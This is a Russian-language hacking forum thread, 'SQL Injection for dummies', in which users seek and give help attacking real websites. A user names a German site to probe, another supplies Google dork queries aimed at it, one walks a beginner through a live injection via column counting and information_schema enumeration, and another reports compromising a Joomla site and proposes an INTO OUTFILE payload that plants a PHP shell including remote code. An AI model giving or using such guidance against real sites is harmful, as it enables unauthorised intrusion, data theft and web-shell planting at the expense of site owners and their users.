1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

SQL Injection для чайников

Тема в разделе "Web-хакинг", создана пользователем rijy, 6 авг 2006.

  1. Fild3y
    Fild3y Guest
    Жалко сюда выкладывать :D) Там портал с 80к пользывателями )) лано сам поипуся)
     
    24 апр 2011
  2. borons
    borons Новичок
    Симпатии:
    0
    Прочитал - много полезного подчерпнул - не мало гневного ;) вырожаю личную просьбу -- пожалуйста не забрасывайте данную тему , буду очень благодарен основателю поста , если в ближайшем будущем выйдут новые работы с описанием ...
     
    2 окт 2011
  3. _PARADOX_
    _PARADOX_ Новичок
    Симпатии:
    0
    Доброго времени суток! Можете дать адрес где есть какая-нибудь из описаных выше уязвимостей?) Просто решил это изучить , а лучше учится на готовых примерах).
     
    16 дек 2011
  4. volod1a
    volod1a Новичок
    Симпатии:
    0
  5. Desperate
    Desperate Новичок
    Симпатии:
    0
    ребят прости за тупой вопрос просто хочу разобраться боле детально на примере мере если мы видим ссылку такова вида
    http://www.gemeindefreiheit.de/de/aktuelles/news.php?id=20
    и предлагаемым что тут есть скуля ставим вконец урла ' или там тере - или %60 так же вконеце ставим вместо ' и находим уязвимость
    а мой вопрос следующим
    если мы видим к примеру адрес http://www.gemeindefreiheit.de/ тойясть искать сайты не подоркам а проверить если скуля конкурентном сайте или нет
     
    19 фев 2012
  6. xeran
    xeran Продвинутый
    Симпатии:
    47
    Desperate,
    украина?
    По-моему, ты сам ответил на свой вопрос.
    Заходишь на сайт и смотришь, если ли ссылки с динамическими параметрами, формы и проверяешь их на inj.
     
    3 мар 2012
  7. .2FED
    .2FED Новичок
    Симпатии:
    8
    Desperate, так же возможно призвать на помощь "корпорацию зла", например нас интересует сайт gemeindefreiheit.de
    Запрос к гуглу в виде:
    Код:
    site:gemeindefreiheit.de inurl:".php?"
    покажет нам имеющиеся проиндексированные ссылки с параметрами.
    Этот запрос можно модифицировать под те или иные нужды, в зависимости от ситуации, подставляя
    Код:
    inurl:".asp?"
    или
    Код:
    inurl:"/?="
    Но лучше, конечно, смотреть самостоятельно.
     
    5 мар 2012
  8. Desperate
    Desperate Новичок
    Симпатии:
    0
    twoFeD спс за развернутый ответ
     
    12 мар 2012
  9. Dr. W@tson
    Dr. W@tson Новичок
    Симпатии:
    4
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 100 or greater.**
    Помогите тут провернуть
     
    17 мар 2012
  10. p0wER
    p0wER Новичок
    Симпатии:
    41
    Dr. W@tson, а что не получается?
     
    17 мар 2012
  11. Dr. W@tson
    Dr. W@tson Новичок
    Симпатии:
    4
    С чего начать? Все по мануалу делаю , никаких ошибок не выдает . Наставте на путь истинный на этом примере
     
    17 мар 2012
  12. Nosaer
    Nosaer Модератор
    Симпатии:
    15
    Значит либо нет уязвимостей, либо все таки что то не так делаешь...
    П.С.По этим вещам все разжевано до не возможности уже...

    На крайний случай выкладывай как делаешь, и что именно не получается.
     
    18 мар 2012
  13. Dr. W@tson
    Dr. W@tson Новичок
    Симпатии:
    4
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 100 or greater.**
    (((( Пипец
     
    18 мар 2012
  14. Mei
    Mei bit of love Продвинутый
    Симпатии:
    220
    Dr. W@tson, у тебя там лишние пробелы в урл закрались, убери) Скуля все еще действующая, без обработчиков, простая.

    таблицы Users там не помню, вроде не было, вслепую ломишься. Для начала верни 21 колонку для вывода, потом начинай через table_name <...> from information_schema.tables limit *,1-- выводить имена таблиц, высматривать более интересные.
     
    18 мар 2012
  15. DarkAvenger
    DarkAvenger Новичок
    Симпатии:
    0
    Попробуй начать с проги havij и используй дорки.
     
    13 май 2012
  16. cat1vo
    cat1vo Новичок
    Симпатии:
    8
    Попробуй не начинать с проги havij, а начать с книг по SQL и другим СУБД!:)
     
    14 май 2012
    3 пользователям это понравилось.
  17. PilotKaa
    PilotKaa Новичок
    Симпатии:
    5
    ____vbios.com/ Я правильно понял что это хтмл и скрипты выполняются на серваке?
    Что в этом случае делать?Вбивать в форму ввода?
     
    Последнее редактирование: 6 июн 2012
    6 июн 2012
  18. Nosaer
    Nosaer Модератор
    Симпатии:
    15
  19. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    мою тему только что удалили без объяснения причин. напишу тут. ломанул сайт на джумле с помощью sql inj. Но среди юзеров нет суперадмина(или суперюзера), а прав у тех юзеров, что есть на сайте не хватает на то, чтобы что-то залить (мне надо залить шелл). точнее они могут заливать картинки, а добавить в настройках в разрешенные расширения php не могут. и вот, возник вопрос. как добавить нового пользователя с правами супер-админа(или суперюзера), чтобы залить шелл в джумлу. и хватит удалять мои посты без объяснений!
    или может мне использовать

    select '<? @include("http://мой_шелл.txt"); ?>' into outfile '/home/www/publ/site/shel.php';
    ?
    можно так?
     
    Последнее редактирование: 23 авг 2012
    23 авг 2012
  20. Dr. W@tson
    Dr. W@tson Новичок
    Симпатии:
    4
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
    Что не так?
     
    4 ноя 2012

Поделиться этой страницей

Загрузка...